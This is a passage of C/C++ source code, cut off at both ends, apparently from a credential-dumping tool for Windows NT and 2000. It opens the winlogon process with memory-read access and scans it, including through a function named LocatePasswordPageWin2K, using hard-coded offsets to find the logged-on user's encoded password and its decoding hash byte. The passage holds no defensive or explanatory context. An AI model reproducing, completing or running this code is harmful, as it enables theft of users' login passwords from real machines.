;       & 0x00ff) / sizeof (wchar_t);
                    dwHashByte = (pepiEncodedPwdInfo->EncodedPassword.Length
                            & 0xff00) >> 8;
                    pvRealPwd = (PVOID)(*pdwWinLogonHeap + (dwUserNamePos -
                            (DWORD)pvWinLogonMem) + USER_PASSWORD_OFFSET_WINNT + 0x34);
                    pvPwd = (PVOID)((PBYTE)(dwUserNamePos +
                            USER_PASSWORD_OFFSET_WINNT + 0x34));
                    bRc = TRUE;
                }
            }
        }
    HeapFree(GetProcessHeap(), 0, pvEBP);
    CloseHandle(hWinLogonHandle);
    return (bRc);
}
//---------------------------------------------------------------------------
BOOL LocatePasswordPageWin2K(DWORD dwWinLogonPID, PDWORD pdwPwdLen)
{
    #define USER_DOMAIN_OFFSET_WIN2K    0x400
    #define USER_PASSWORD_OFFSET_WIN2K    0x800
    HANDLE hWinLogonHandle = OpenProcess(PROCESS_QUERY_INFORMATION |
            PROCESS_VM_READ, FALSE, dwWinLogonPID);
    if(hWinLogonHandle == 0)
        return (FALSE);
    *pdwPwdLen = 0;
    SYSTEM_INFO siSystemInfo;
    GetSystemInfo(&siSystemInfo);
    DWORD i = (DWORD)siSystemInfo.lpMinimumApplicationAddress;
    DWORD dwMaxMemory = (DWORD) siSystemInfo.lpMaximumApplicationAddress;
    DWORD dwIncrement = siSystemInfo.d